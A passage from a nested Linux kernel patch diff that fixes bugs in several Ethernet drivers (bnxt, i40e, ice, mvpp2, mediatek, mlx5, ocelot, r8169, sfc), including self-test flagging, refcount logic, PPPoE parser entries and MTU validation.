++		return SPEED_200000;
+ 	default:
+ 		return SPEED_UNKNOWN;
+ 	}
+@@ -3634,6 +3636,7 @@ static void bnxt_self_test(struct net_device *dev, struct ethtool_test *etest,
+ 		bnxt_ulp_stop(bp);
+ 		rc = bnxt_close_nic(bp, true, false);
+ 		if (rc) {
++			etest->flags |= ETH_TEST_FL_FAILED;
+ 			bnxt_ulp_start(bp, rc);
+ 			return;
+ 		}
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_diag.c b/drivers/net/ethernet/intel/i40e/i40e_diag.c
+index ef4d3762bf371..ca229b0efeb65 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_diag.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_diag.c
+@@ -44,7 +44,7 @@ static i40e_status i40e_diag_reg_pattern_test(struct i40e_hw *hw,
+ 	return 0;
+ }
+ 
+-struct i40e_diag_reg_test_info i40e_reg_list[] = {
++const struct i40e_diag_reg_test_info i40e_reg_list[] = {
+ 	/* offset               mask         elements   stride */
+ 	{I40E_QTX_CTL(0),       0x0000FFBF, 1,
+ 		I40E_QTX_CTL(1) - I40E_QTX_CTL(0)},
+@@ -78,27 +78,28 @@ i40e_status i40e_diag_reg_test(struct i40e_hw *hw)
+ {
+ 	i40e_status ret_code = 0;
+ 	u32 reg, mask;
++	u32 elements;
+ 	u32 i, j;
+ 
+ 	for (i = 0; i40e_reg_list[i].offset != 0 &&
+ 					     !ret_code; i++) {
+ 
++		elements = i40e_reg_list[i].elements;
+ 		/* set actual reg range for dynamically allocated resources */
+ 		if (i40e_reg_list[i].offset == I40E_QTX_CTL(0) &&
+ 		    hw->func_caps.num_tx_qp != 0)
+-			i40e_reg_list[i].elements = hw->func_caps.num_tx_qp;
++			elements = hw->func_caps.num_tx_qp;
+ 		if ((i40e_reg_list[i].offset == I40E_PFINT_ITRN(0, 0) ||
+ 		     i40e_reg_list[i].offset == I40E_PFINT_ITRN(1, 0) ||
+ 		     i40e_reg_list[i].offset == I40E_PFINT_ITRN(2, 0) ||
+ 		     i40e_reg_list[i].offset == I40E_QINT_TQCTL(0) ||
+ 		     i40e_reg_list[i].offset == I40E_QINT_RQCTL(0)) &&
+ 		    hw->func_caps.num_msix_vectors != 0)
+-			i40e_reg_list[i].elements =
+-				hw->func_caps.num_msix_vectors - 1;
++			elements = hw->func_caps.num_msix_vectors - 1;
+ 
+ 		/* test register access */
+ 		mask = i40e_reg_list[i].mask;
+-		for (j = 0; j < i40e_reg_list[i].elements && !ret_code; j++) {
++		for (j = 0; j < elements && !ret_code; j++) {
+ 			reg = i40e_reg_list[i].offset +
+ 			      (j * i40e_reg_list[i].stride);
+ 			ret_code = i40e_diag_reg_pattern_test(hw, reg, mask);
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_diag.h b/drivers/net/ethernet/intel/i40e/i40e_diag.h
+index c3340f320a18c..1db7c6d572311 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_diag.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_diag.h
+@@ -20,7 +20,7 @@ struct i40e_diag_reg_test_info {
+ 	u32 stride;	/* bytes between each element */
+ };
+ 
+-extern struct i40e_diag_reg_test_info i40e_reg_list[];
++extern const struct i40e_diag_reg_test_info i40e_reg_list[];
+ 
+ i40e_status i40e_diag_reg_test(struct i40e_hw *hw);
+ i40e_status i40e_diag_eeprom_test(struct i40e_hw *hw);
+diff --git a/drivers/net/ethernet/intel/ice/ice_sched.c b/drivers/net/ethernet/intel/ice/ice_sched.c
+index 118595763bba3..2c62c1763ee0d 100644
+--- a/drivers/net/ethernet/intel/ice/ice_sched.c
++++ b/drivers/net/ethernet/intel/ice/ice_sched.c
+@@ -2756,7 +2756,7 @@ static int
+ ice_sched_assoc_vsi_to_agg(struct ice_port_info *pi, u32 agg_id,
+ 			   u16 vsi_handle, unsigned long *tc_bitmap)
+ {
+-	struct ice_sched_agg_vsi_info *agg_vsi_info, *old_agg_vsi_info = NULL;
++	struct ice_sched_agg_vsi_info *agg_vsi_info, *iter, *old_agg_vsi_info = NULL;
+ 	struct ice_sched_agg_info *agg_info, *old_agg_info;
+ 	struct ice_hw *hw = pi->hw;
+ 	int status = 0;
+@@ -2774,11 +2774,13 @@ ice_sched_assoc_vsi_to_agg(struct ice_port_info *pi, u32 agg_id,
+ 	if (old_agg_info && old_agg_info != agg_info) {
+ 		struct ice_sched_agg_vsi_info *vtmp;
+ 
+-		list_for_each_entry_safe(old_agg_vsi_info, vtmp,
++		list_for_each_entry_safe(iter, vtmp,
+ 					 &old_agg_info->agg_vsi_list,
+ 					 list_entry)
+-			if (old_agg_vsi_info->vsi_handle == vsi_handle)
++			if (iter->vsi_handle == vsi_handle) {
++				old_agg_vsi_info = iter;
+ 				break;
++			}
+ 	}
+ 
+ 	/* check if entry already exist */
+diff --git a/drivers/net/ethernet/intel/ice/ice_switch.c b/drivers/net/ethernet/intel/ice/ice_switch.c
+index 61f844d225123..46b36851af460 100644
+--- a/drivers/net/ethernet/intel/ice/ice_switch.c
++++ b/drivers/net/ethernet/intel/ice/ice_switch.c
+@@ -1780,18 +1780,36 @@ ice_update_vsi(struct ice_hw *hw, u16 vsi_handle, struct ice_vsi_ctx *vsi_ctx,
+ int
+ ice_cfg_rdma_fltr(struct ice_hw *hw, u16 vsi_handle, bool enable)
+ {
+-	struct ice_vsi_ctx *ctx;
++	struct ice_vsi_ctx *ctx, *cached_ctx;
++	int status;
++
++	cached_ctx = ice_get_vsi_ctx(hw, vsi_handle);
++	if (!cached_ctx)
++		return -ENOENT;
+ 
+-	ctx = ice_get_vsi_ctx(hw, vsi_handle);
++	ctx = kzalloc(sizeof(*ctx), GFP_KERNEL);
+ 	if (!ctx)
+-		return -EIO;
++		return -ENOMEM;
++
++	ctx->info.q_opt_rss = cached_ctx->info.q_opt_rss;
++	ctx->info.q_opt_tc = cached_ctx->info.q_opt_tc;
++	ctx->info.q_opt_flags = cached_ctx->info.q_opt_flags;
++
++	ctx->info.valid_sections = cpu_to_le16(ICE_AQ_VSI_PROP_Q_OPT_VALID);
+ 
+ 	if (enable)
+ 		ctx->info.q_opt_flags |= ICE_AQ_VSI_Q_OPT_PE_FLTR_EN;
+ 	else
+ 		ctx->info.q_opt_flags &= ~ICE_AQ_VSI_Q_OPT_PE_FLTR_EN;
+ 
+-	return ice_update_vsi(hw, vsi_handle, ctx, NULL);
++	status = ice_update_vsi(hw, vsi_handle, ctx, NULL);
++	if (!status) {
++		cached_ctx->info.q_opt_flags = ctx->info.q_opt_flags;
++		cached_ctx->info.valid_sections |= ctx->info.valid_sections;
++	}
++
++	kfree(ctx);
++	return status;
+ }
+ 
+ /**
+diff --git a/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c b/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c
+index c6a58343d81d8..a2645ff3100e4 100644
+--- a/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c
++++ b/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c
+@@ -541,6 +541,72 @@ static void ice_vc_fdir_rem_prof_all(struct ice_vf *vf)
+ 	}
+ }
+ 
++/**
++ * ice_vc_fdir_has_prof_conflict
++ * @vf: pointer to the VF structure
++ * @conf: FDIR configuration for each filter
++ *
++ * Check if @conf has conflicting profile with existing profiles
++ *
++ * Return: true on success, and false on error.
++ */
++static bool
++ice_vc_fdir_has_prof_conflict(struct ice_vf *vf,
++			      struct virtchnl_fdir_fltr_conf *conf)
++{
++	struct ice_fdir_fltr *desc;
++
++	list_for_each_entry(desc, &vf->fdir.fdir_rule_list, fltr_node) {
++		struct virtchnl_fdir_fltr_conf *existing_conf;
++		enum ice_fltr_ptype flow_type_a, flow_type_b;
++		struct ice_fdir_fltr *a, *b;
++
++		existing_conf = to_fltr_conf_from_desc(desc);
++		a = &existing_conf->input;
++		b = &conf->input;
++		flow_type_a = a->flow_type;
++		flow_type_b = b->flow_type;
++
++		/* No need to compare two rules with different tunnel types or
++		 * with the same protocol type.
++		 */
++		if (existing_conf->ttype != conf->ttype ||
++		    flow_type_a == flow_type_b)
++			continue;
++
++		switch (flow_type_a) {
++		case ICE_FLTR_PTYPE_NONF_IPV4_UDP:
++		case ICE_FLTR_PTYPE_NONF_IPV4_TCP:
++		case ICE_FLTR_PTYPE_NONF_IPV4_SCTP:
++			if (flow_type_b == ICE_FLTR_PTYPE_NONF_IPV4_OTHER)
++				return true;
++			break;
++		case ICE_FLTR_PTYPE_NONF_IPV4_OTHER:
++			if (flow_type_b == ICE_FLTR_PTYPE_NONF_IPV4_UDP ||
++			    flow_type_b == ICE_FLTR_PTYPE_NONF_IPV4_TCP ||
++			    flow_type_b == ICE_FLTR_PTYPE_NONF_IPV4_SCTP)
++				return true;
++			break;
++		case ICE_FLTR_PTYPE_NONF_IPV6_UDP:
++		case ICE_FLTR_PTYPE_NONF_IPV6_TCP:
++		case ICE_FLTR_PTYPE_NONF_IPV6_SCTP:
++			if (flow_type_b == ICE_FLTR_PTYPE_NONF_IPV6_OTHER)
++				return true;
++			break;
++		case ICE_FLTR_PTYPE_NONF_IPV6_OTHER:
++			if (flow_type_b == ICE_FLTR_PTYPE_NONF_IPV6_UDP ||
++			    flow_type_b == ICE_FLTR_PTYPE_NONF_IPV6_TCP ||
++			    flow_type_b == ICE_FLTR_PTYPE_NONF_IPV6_SCTP)
++				return true;
++			break;
++		default:
++			break;
++		}
++	}
++
++	return false;
++}
++
+ /**
+  * ice_vc_fdir_write_flow_prof
+  * @vf: pointer to the VF structure
+@@ -677,6 +743,13 @@ ice_vc_fdir_config_input_set(struct ice_vf *vf, struct virtchnl_fdir_add *fltr,
+ 	enum ice_fltr_ptype flow;
+ 	int ret;
+ 
++	ret = ice_vc_fdir_has_prof_conflict(vf, conf);
++	if (ret) {
++		dev_dbg(dev, "Found flow profile conflict for VF %d\n",
++			vf->vf_id);
++		return ret;
++	}
++
+ 	flow = input->flow_type;
+ 	ret = ice_vc_fdir_alloc_prof(vf, flow);
+ 	if (ret) {
+diff --git a/drivers/net/ethernet/marvell/mvpp2/mvpp2_cls.c b/drivers/net/ethernet/marvell/mvpp2/mvpp2_cls.c
+index 41d935d1aaf6f..40aeaa7bd739f 100644
+--- a/drivers/net/ethernet/marvell/mvpp2/mvpp2_cls.c
++++ b/drivers/net/ethernet/marvell/mvpp2/mvpp2_cls.c
+@@ -62,35 +62,38 @@ static const struct mvpp2_cls_flow cls_flows[MVPP2_N_PRS_FLOWS] = {
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_TCP4, MVPP2_FL_IP4_TCP_FRAG_UNTAG,
+ 		       MVPP22_CLS_HEK_IP4_2T,
+ 		       MVPP2_PRS_RI_VLAN_NONE | MVPP2_PRS_RI_L3_IP4 |
+-		       MVPP2_PRS_RI_L4_TCP,
++		       MVPP2_PRS_RI_IP_FRAG_TRUE | MVPP2_PRS_RI_L4_TCP,
+ 		       MVPP2_PRS_IP_MASK | MVPP2_PRS_RI_VLAN_MASK),
+ 
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_TCP4, MVPP2_FL_IP4_TCP_FRAG_UNTAG,
+ 		       MVPP22_CLS_HEK_IP4_2T,
+ 		       MVPP2_PRS_RI_VLAN_NONE | MVPP2_PRS_RI_L3_IP4_OPT |
+-		       MVPP2_PRS_RI_L4_TCP,
++		       MVPP2_PRS_RI_IP_FRAG_TRUE | MVPP2_PRS_RI_L4_TCP,
+ 		       MVPP2_PRS_IP_MASK | MVPP2_PRS_RI_VLAN_MASK),
+ 
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_TCP4, MVPP2_FL_IP4_TCP_FRAG_UNTAG,
+ 		       MVPP22_CLS_HEK_IP4_2T,
+ 		       MVPP2_PRS_RI_VLAN_NONE | MVPP2_PRS_RI_L3_IP4_OTHER |
+-		       MVPP2_PRS_RI_L4_TCP,
++		       MVPP2_PRS_RI_IP_FRAG_TRUE | MVPP2_PRS_RI_L4_TCP,
+ 		       MVPP2_PRS_IP_MASK | MVPP2_PRS_RI_VLAN_MASK),
+ 
+ 	/* TCP over IPv4 flows, fragmented, with vlan tag */
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_TCP4, MVPP2_FL_IP4_TCP_FRAG_TAG,
+ 		       MVPP22_CLS_HEK_IP4_2T | MVPP22_CLS_HEK_TAGGED,
+-		       MVPP2_PRS_RI_L3_IP4 | MVPP2_PRS_RI_L4_TCP,
++		       MVPP2_PRS_RI_L3_IP4 | MVPP2_PRS_RI_IP_FRAG_TRUE |
++			   MVPP2_PRS_RI_L4_TCP,
+ 		       MVPP2_PRS_IP_MASK),
+ 
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_TCP4, MVPP2_FL_IP4_TCP_FRAG_TAG,
+ 		       MVPP22_CLS_HEK_IP4_2T | MVPP22_CLS_HEK_TAGGED,
+-		       MVPP2_PRS_RI_L3_IP4_OPT | MVPP2_PRS_RI_L4_TCP,
++		       MVPP2_PRS_RI_L3_IP4_OPT | MVPP2_PRS_RI_IP_FRAG_TRUE |
++			   MVPP2_PRS_RI_L4_TCP,
+ 		       MVPP2_PRS_IP_MASK),
+ 
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_TCP4, MVPP2_FL_IP4_TCP_FRAG_TAG,
+ 		       MVPP22_CLS_HEK_IP4_2T | MVPP22_CLS_HEK_TAGGED,
+-		       MVPP2_PRS_RI_L3_IP4_OTHER | MVPP2_PRS_RI_L4_TCP,
++		       MVPP2_PRS_RI_L3_IP4_OTHER | MVPP2_PRS_RI_IP_FRAG_TRUE |
++			   MVPP2_PRS_RI_L4_TCP,
+ 		       MVPP2_PRS_IP_MASK),
+ 
+ 	/* UDP over IPv4 flows, Not fragmented, no vlan tag */
+@@ -132,35 +135,38 @@ static const struct mvpp2_cls_flow cls_flows[MVPP2_N_PRS_FLOWS] = {
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_UDP4, MVPP2_FL_IP4_UDP_FRAG_UNTAG,
+ 		       MVPP22_CLS_HEK_IP4_2T,
+ 		       MVPP2_PRS_RI_VLAN_NONE | MVPP2_PRS_RI_L3_IP4 |
+-		       MVPP2_PRS_RI_L4_UDP,
++		       MVPP2_PRS_RI_IP_FRAG_TRUE | MVPP2_PRS_RI_L4_UDP,
+ 		       MVPP2_PRS_IP_MASK | MVPP2_PRS_RI_VLAN_MASK),
+ 
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_UDP4, MVPP2_FL_IP4_UDP_FRAG_UNTAG,
+ 		       MVPP22_CLS_HEK_IP4_2T,
+ 		       MVPP2_PRS_RI_VLAN_NONE | MVPP2_PRS_RI_L3_IP4_OPT |
+-		       MVPP2_PRS_RI_L4_UDP,
++		       MVPP2_PRS_RI_IP_FRAG_TRUE | MVPP2_PRS_RI_L4_UDP,
+ 		       MVPP2_PRS_IP_MASK | MVPP2_PRS_RI_VLAN_MASK),
+ 
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_UDP4, MVPP2_FL_IP4_UDP_FRAG_UNTAG,
+ 		       MVPP22_CLS_HEK_IP4_2T,
+ 		       MVPP2_PRS_RI_VLAN_NONE | MVPP2_PRS_RI_L3_IP4_OTHER |
+-		       MVPP2_PRS_RI_L4_UDP,
++		       MVPP2_PRS_RI_IP_FRAG_TRUE | MVPP2_PRS_RI_L4_UDP,
+ 		       MVPP2_PRS_IP_MASK | MVPP2_PRS_RI_VLAN_MASK),
+ 
+ 	/* UDP over IPv4 flows, fragmented, with vlan tag */
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_UDP4, MVPP2_FL_IP4_UDP_FRAG_TAG,
+ 		       MVPP22_CLS_HEK_IP4_2T | MVPP22_CLS_HEK_TAGGED,
+-		       MVPP2_PRS_RI_L3_IP4 | MVPP2_PRS_RI_L4_UDP,
++		       MVPP2_PRS_RI_L3_IP4 | MVPP2_PRS_RI_IP_FRAG_TRUE |
++			   MVPP2_PRS_RI_L4_UDP,
+ 		       MVPP2_PRS_IP_MASK),
+ 
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_UDP4, MVPP2_FL_IP4_UDP_FRAG_TAG,
+ 		       MVPP22_CLS_HEK_IP4_2T | MVPP22_CLS_HEK_TAGGED,
+-		       MVPP2_PRS_RI_L3_IP4_OPT | MVPP2_PRS_RI_L4_UDP,
++		       MVPP2_PRS_RI_L3_IP4_OPT | MVPP2_PRS_RI_IP_FRAG_TRUE |
++			   MVPP2_PRS_RI_L4_UDP,
+ 		       MVPP2_PRS_IP_MASK),
+ 
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_UDP4, MVPP2_FL_IP4_UDP_FRAG_TAG,
+ 		       MVPP22_CLS_HEK_IP4_2T | MVPP22_CLS_HEK_TAGGED,
+-		       MVPP2_PRS_RI_L3_IP4_OTHER | MVPP2_PRS_RI_L4_UDP,
++		       MVPP2_PRS_RI_L3_IP4_OTHER | MVPP2_PRS_RI_IP_FRAG_TRUE |
++			   MVPP2_PRS_RI_L4_UDP,
+ 		       MVPP2_PRS_IP_MASK),
+ 
+ 	/* TCP over IPv6 flows, not fragmented, no vlan tag */
+diff --git a/drivers/net/ethernet/marvell/mvpp2/mvpp2_prs.c b/drivers/net/ethernet/marvell/mvpp2/mvpp2_prs.c
+index 75ba57bd1d46d..9af22f497a40f 100644
+--- a/drivers/net/ethernet/marvell/mvpp2/mvpp2_prs.c
++++ b/drivers/net/ethernet/marvell/mvpp2/mvpp2_prs.c
+@@ -1539,8 +1539,8 @@ static int mvpp2_prs_vlan_init(struct platform_device *pdev, struct mvpp2 *priv)
+ 	if (!priv->prs_double_vlans)
+ 		return -ENOMEM;
+ 
+-	/* Double VLAN: 0x8100, 0x88A8 */
+-	err = mvpp2_prs_double_vlan_add(priv, ETH_P_8021Q, ETH_P_8021AD,
++	/* Double VLAN: 0x88A8, 0x8100 */
++	err = mvpp2_prs_double_vlan_add(priv, ETH_P_8021AD, ETH_P_8021Q,
+ 					MVPP2_PRS_PORT_MASK);
+ 	if (err)
+ 		return err;
+@@ -1607,59 +1607,45 @@ static int mvpp2_prs_vlan_init(struct platform_device *pdev, struct mvpp2 *priv)
+ static int mvpp2_prs_pppoe_init(struct mvpp2 *priv)
+ {
+ 	struct mvpp2_prs_entry pe;
+-	int tid;
+-
+-	/* IPv4 over PPPoE with options */
+-	tid = mvpp2_prs_tcam_first_free(priv, MVPP2_PE_FIRST_FREE_TID,
+-					MVPP2_PE_LAST_FREE_TID);
+-	if (tid < 0)
+-		return tid;
+-
+-	memset(&pe, 0, sizeof(pe));
+-	mvpp2_prs_tcam_lu_set(&pe, MVPP2_PRS_LU_PPPOE);
+-	pe.index = tid;
+-
+-	mvpp2_prs_match_etype(&pe, 0, PPP_IP);
+-
+-	mvpp2_prs_sram_next_lu_set(&pe, MVPP2_PRS_LU_IP4);
+-	mvpp2_prs_sram_ri_update(&pe, MVPP2_PRS_RI_L3_IP4_OPT,
+-				 MVPP2_PRS_RI_L3_PROTO_MASK);
+-	/* goto ipv4 dest-address (skip eth_type + IP-header-size - 4) */
+-	mvpp2_prs_sram_shift_set(&pe, MVPP2_ETH_TYPE_LEN +
+-				 sizeof(struct iphdr) - 4,
+-				 MVPP2_PRS_SRAM_OP_SEL_SHIFT_ADD);
+-	/* Set L3 offset */
+-	mvpp2_prs_sram_offset_set(&pe, MVPP2_PRS_SRAM_UDF_TYPE_L3,
+-				  MVPP2_ETH_TYPE_LEN,
+-				  MVPP2_PRS_SRAM_OP_SEL_UDF_ADD);
+-
+-	/* Update shadow table and hw entry */
+-	mvpp2_prs_shadow_set(priv, pe.index, MVPP2_PRS_LU_PPPOE);
+-	mvpp2_prs_hw_write(priv, &pe);
++	int tid, ihl;
+ 
+-	/* IPv4 over PPPoE without options */
+-	tid = mvpp2_prs_tcam_first_free(priv, MVPP2_PE_FIRST_FREE_TID,
+-					MVPP2_PE_LAST_FREE_TID);
+-	if (tid < 0)
+-		return tid;
++	/* IPv4 over PPPoE with header length >= 5 */
++	for (ihl = MVPP2_PRS_IPV4_IHL_MIN; ihl <= MVPP2_PRS_IPV4_IHL_MAX; ihl++) {
++		tid = mvpp2_prs_tcam_first_free(priv, MVPP2_PE_FIRST_FREE_TID,
++						MVPP2_PE_LAST_FREE_TID);
++		if (tid < 0)
++			return tid;
+ 
+-	pe.index = tid;
++		memset(&pe, 0, sizeof(pe));
++		mvpp2_prs_tcam_lu_set(&pe, MVPP2_PRS_LU_PPPOE);
++		pe.index = tid;
+ 
+-	mvpp2_prs_tcam_data_byte_set(&pe, MVPP2_ETH_TYPE_LEN,
+-				     MVPP2_PRS_IPV4_HEAD |
+-				     MVPP2_PRS_IPV4_IHL_MIN,
+-				     MVPP2_PRS_IPV4_HEAD_MASK |
+-				     MVPP2_PRS_IPV4_IHL_MASK);
++		mvpp2_prs_match_etype(&pe, 0, PPP_IP);
++		mvpp2_prs_tcam_data_byte_set(&pe, MVPP2_ETH_TYPE_LEN,
++					     MVPP2_PRS_IPV4_HEAD | ihl,
++					     MVPP2_PRS_IPV4_HEAD_MASK |
++					     MVPP2_PRS_IPV4_IHL_MASK);
+ 
+-	/* Clear ri before updating */
+-	pe.sram[MVPP2_PRS_SRAM_RI_WORD] = 0x0;
+-	pe.sram[MVPP2_PRS_SRAM_RI_CTRL_WORD] = 0x0;
+-	mvpp2_prs_sram_ri_update(&pe, MVPP2_PRS_RI_L3_IP4,
+-				 MVPP2_PRS_RI_L3_PROTO_MASK);
++		mvpp2_prs_sram_next_lu_set(&pe, MVPP2_PRS_LU_IP4);
++		mvpp2_prs_sram_ri_update(&pe, MVPP2_PRS_RI_L3_IP4,
++					 MVPP2_PRS_RI_L3_PROTO_MASK);
++		/* goto ipv4 dst-address (skip eth_type + IP-header-size - 4) */
++		mvpp2_prs_sram_shift_set(&pe, MVPP2_ETH_TYPE_LEN +
++					 sizeof(struct iphdr) - 4,
++					 MVPP2_PRS_SRAM_OP_SEL_SHIFT_ADD);
++		/* Set L3 offset */
++		mvpp2_prs_sram_offset_set(&pe, MVPP2_PRS_SRAM_UDF_TYPE_L3,
++					  MVPP2_ETH_TYPE_LEN,
++					  MVPP2_PRS_SRAM_OP_SEL_UDF_ADD);
++		/* Set L4 offset */
++		mvpp2_prs_sram_offset_set(&pe, MVPP2_PRS_SRAM_UDF_TYPE_L4,
++					  MVPP2_ETH_TYPE_LEN + (ihl * 4),
++					  MVPP2_PRS_SRAM_OP_SEL_UDF_ADD);
+ 
+-	/* Update shadow table and hw entry */
+-	mvpp2_prs_shadow_set(priv, pe.index, MVPP2_PRS_LU_PPPOE);
+-	mvpp2_prs_hw_write(priv, &pe);
++		/* Update shadow table and hw entry */
++		mvpp2_prs_shadow_set(priv, pe.index, MVPP2_PRS_LU_PPPOE);
++		mvpp2_prs_hw_write(priv, &pe);
++	}
+ 
+ 	/* IPv6 over PPPoE */
+ 	tid = mvpp2_prs_tcam_first_free(priv, MVPP2_PE_FIRST_FREE_TID,
+diff --git a/drivers/net/ethernet/mediatek/mtk_ppe.c b/drivers/net/ethernet/mediatek/mtk_ppe.c
+index 34ea8af48c3d0..d6eed204574a9 100644
+--- a/drivers/net/ethernet/mediatek/mtk_ppe.c
++++ b/drivers/net/ethernet/mediatek/mtk_ppe.c
+@@ -438,6 +438,7 @@ __mtk_foe_entry_clear(struct mtk_ppe *ppe, struct mtk_flow_entry *entry)
+ 		hwe->ib1 &= ~MTK_FOE_IB1_STATE;
+ 		hwe->ib1 |= FIELD_PREP(MTK_FOE_IB1_STATE, MTK_FOE_STATE_INVALID);
+ 		dma_wmb();
++		mtk_ppe_cache_clear(ppe);
+ 	}
+ 	entry->hash = 0xffff;
+ 
+diff --git a/drivers/net/ethernet/mediatek/mtk_ppe_offload.c b/drivers/net/ethernet/mediatek/mtk_ppe_offload.c
+index 28bbd1df3e305..6a72687d5b83f 100644
+--- a/drivers/net/ethernet/mediatek/mtk_ppe_offload.c
++++ b/drivers/net/ethernet/mediatek/mtk_ppe_offload.c
+@@ -570,6 +570,7 @@ mtk_eth_setup_tc_block(struct net_device *dev, struct flow_block_offload *f)
+ 		if (IS_ERR(block_cb))
+ 			return PTR_ERR(block_cb);
+ 
++		flow_block_cb_incref(block_cb);
+ 		flow_block_cb_add(block_cb, f);
+ 		list_add_tail(&block_cb->driver_list, &block_cb_list);
+ 		return 0;
+@@ -578,7 +579,7 @@ mtk_eth_setup_tc_block(struct net_device *dev, struct flow_block_offload *f)
+ 		if (!block_cb)
+ 			return -ENOENT;
+ 
+-		if (flow_block_cb_decref(block_cb)) {
++		if (!flow_block_cb_decref(block_cb)) {
+ 			flow_block_cb_remove(block_cb, f);
+ 			list_del(&block_cb->driver_list);
+ 		}
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+index 3b5c5064cfafc..5e01de4c32037 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+@@ -4104,13 +4104,17 @@ static bool mlx5e_xsk_validate_mtu(struct net_device *netdev,
+ 		struct xsk_buff_pool *xsk_pool =
+ 			mlx5e_xsk_get_pool(&chs->params, chs->params.xsk, ix);
+ 		struct mlx5e_xsk_param xsk;
++		int max_xdp_mtu;
+ 
+ 		if (!xsk_pool)
+ 			continue;
+ 
+ 		mlx5e_build_xsk_param(xsk_pool, &xsk);
++		max_xdp_mtu = mlx5e_xdp_max_mtu(new_params, &xsk);
+ 
+-		if (!mlx5e_validate_xsk_param(new_params, &xsk, mdev)) {
++		/* Validate XSK params and XDP MTU in advance */
++		if (!mlx5e_validate_xsk_param(new_params, &xsk, mdev) ||
++		    new_params->sw_mtu > max_xdp_mtu) {
+ 			u32 hr = mlx5e_get_linear_rq_headroom(new_params, &xsk);
+ 			int max_mtu_frame, max_mtu_page, max_mtu;
+ 
+@@ -4120,9 +4124,9 @@ static bool mlx5e_xsk_validate_mtu(struct net_device *netdev,
+ 			 */
+ 			max_mtu_frame = MLX5E_HW2SW_MTU(new_params, xsk.chunk_size - hr);
+ 			max_mtu_page = MLX5E_HW2SW_MTU(new_params, SKB_MAX_HEAD(0));
+-			max_mtu = min(max_mtu_frame, max_mtu_page);
++			max_mtu = min3(max_mtu_frame, max_mtu_page, max_xdp_mtu);
+ 
+-			netdev_err(netdev, "MTU %d is too big for an XSK running on channel %u. Try MTU <= %d\n",
++			netdev_err(netdev, "MTU %d is too big for an XSK running on channel %u or its redirection XDP program. Try MTU <= %d\n",
+ 				   new_params->sw_mtu, ix, max_mtu);
+ 			return false;
+ 		}
+diff --git a/drivers/net/ethernet/mscc/ocelot_stats.c b/drivers/net/ethernet/mscc/ocelot_stats.c
+index dbd20b125ceaf..0066219bb0e89 100644
+--- a/drivers/net/ethernet/mscc/ocelot_stats.c
++++ b/drivers/net/ethernet/mscc/ocelot_stats.c
+@@ -392,7 +392,8 @@ static int ocelot_prepare_stats_regions(struct ocelot *ocelot)
+ 		if (!ocelot->stats_layout[i].reg)
+ 			continue;
+ 
+-		if (region && ocelot->stats_layout[i].reg == last + 4) {
++		if (region && ocelot->map[SYS][ocelot->stats_layout[i].reg & REG_MASK] ==
++		    ocelot->map[SYS][last & REG_MASK] + 4) {
+ 			region->count++;
+ 		} else {
+ 			region = devm_kzalloc(ocelot->dev, sizeof(*region),
+diff --git a/drivers/net/ethernet/realtek/r8169_phy_config.c b/drivers/net/ethernet/realtek/r8169_phy_config.c
+index 930496cd34ed0..b50f16786c246 100644
+--- a/drivers/net/ethernet/realtek/r8169_phy_config.c
++++ b/drivers/net/ethernet/realtek/r8169_phy_config.c
+@@ -826,6 +826,9 @@ static void rtl8168h_2_hw_phy_config(struct rtl8169_private *tp,
+ 	/* disable phy pfm mode */
+ 	phy_modify_paged(phydev, 0x0a44, 0x11, BIT(7), 0);
+ 
++	/* disable 10m pll off */
++	phy_modify_paged(phydev, 0x0a43, 0x10, BIT(0), 0);
++
+ 	rtl8168g_disable_aldps(phydev);
+ 	rtl8168g_config_eee_phy(phydev);
+ }
+diff --git a/drivers/net/ethernet/sfc/ef10.c b/drivers/net/ethernet/sfc/ef10.c
+index 7022fb2005a2f..d30459dbfe8f8 100644
+--- a/drivers/net/ethernet/sfc/ef10.c
++++ b/drivers/net/ethernet/sfc/ef10.c
+@@ -1304,7 +1304,8 @@ static void efx_ef10_fini_nic(struct efx_nic *efx)
+ static int efx_ef10_init_nic(struct efx_nic *efx)
+ {
+ 	struct efx_ef10_nic_data *nic_data = efx->nic_data;
+-	netdev_features_t hw_enc_features = 0;
++	struct net_device *net_dev = efx->net_dev;
++	netdev_features_t tun_feats, tso_feats;
+ 	int rc;
+ 
+ 	if (nic_data->must_check_datapath_caps) {
+@@ -1349,20 +1350,30 @@ static int efx_ef10_init_nic(struct efx_nic *efx)
+ 		nic_data->must_restore_piobufs = false;
+ 	}
+ 
+-	/* add encapsulated checksum offload features */
++	/* encap features might change during reset if fw variant changed */
+ 	if (efx_has_cap(efx, VXLAN_NVGRE) && !efx_ef10_is_vf(efx))
+-		hw_enc_features |= NETIF_F_IP_CSUM | NETIF_F_IPV6_CSUM;
+-	/* add encapsulated TSO features */
+-	if (efx_has_cap(efx, TX_TSO_V2_ENCAP)) {
+-		netdev_features_t encap_tso_features;
++		net_dev->hw_enc_features |= NETIF_F_IP_CSUM | NETIF_F_IPV6_CSUM;
++	else
++		net_dev->hw_enc_features &= ~(NETIF_F_IP_CSUM | NETIF_F_IPV6_CSUM);
+ 
+-		encap_tso_features = NETIF_F_GSO_UDP_TUNNEL | NETIF_F_GSO_GRE |
